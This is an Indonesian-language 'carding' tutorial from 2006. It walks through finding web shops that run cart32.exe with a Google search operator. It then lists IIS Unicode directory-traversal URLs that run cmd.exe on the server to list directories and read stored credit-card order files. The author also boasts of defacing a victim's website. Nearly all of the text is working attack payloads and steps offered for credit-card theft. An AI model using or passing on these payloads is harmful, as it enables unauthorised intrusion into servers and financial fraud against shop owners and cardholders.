|
[148]. Tutorial Carding (Bagian
II)
------------------------------------------------------
Author : SPYRO KiD
Contact : SPYRO_ZONE@yahoo.com
==> WWW.SPYROZONE.TK
CopyLEFT (c) 2006
www.spyrozone.tk All Rights Reserved
� 28/09/2006 03:10:10 WIB
------------------------------------------------------
--------------------------------------
Tutorial ini spyro dapatkan dari
suatu ftp seorang korban saat sedang mendeface webnya (lihat posting berjudul "Mengapa
aku mendeface profil FS dan website Fun2Holic" (19 september 2006) di halaman
Cerita hari ini.
--------------------------------------
1. Sama seperti diatas, Cari
target dahulu di google.com dgn keyword allinurl:/cart32.exe/
2. Misalkan kita mendapat target dg url:
http://www.contoh.com/scripts/cart32.exe/blablabla
, maka:
3. Ganti url tsb menjadi ->
http://www.contoh.com/scripts/
4. Modifikasi url tsb dg memasukkan unicode dibelakangnya -> http://www.contoh.com/scripts/<unicode>
5. Contoh unicode utk path /scripts/ : -->
/scripts/%c1%9c/winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c/winnt/system32/cmd.exe?/c+dir+c:\
/scripts/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c+dir+c:\
Sedangkan utk path /cgi-bin/ ->
/cgi-bin/..\..\..\..\..\..\winnt\system32\cmd.exe?/c+dir+c:\
/cgi-bin/..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c/winnt/system32/cmd.exe?/c+dir+c:\
/cgi-bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c+dir+c:\
6. Sebagai contoh, pada url diatas menggunakan path /scripts/ maka diubah
menjadi http://www.contoh.com/scripts/%c1%9c/winnt/system32/cmd.exe?/c+dir+c:\
7. string diakhir unicode dg keterangan dir+c:\ maksudnya kita sedang berada dan
melist directory c server target!
8. Untuk masuk ke directory cc's ganti perintahnya unicode dgn ->
http://www.contoh.com/scripts/%c1%9c/winnt/system32/cmd.exe?/c+dir+c:\progra~1\mwainc\cart32\
9. Kita akan output list dari file .32 sebagai contoh namanya WRBURNS-001065.c32
10. Nah.., utk melihat filenya dg unicode
http://www.contoh.com/scripts/%c1%9c/winnt/system32/cmd.exe?/c+type+c:\progra~1\mwainc\cart32\WRBURNS-001065.c32
11. Kalo tidak berhasil, kita masih bisa mencobanya dengan unicode yg laennya.
12. Ok, semoga berhasil, materi ke-2 Selesai.
/* ------------------------------|EOF|------------------------------ */
|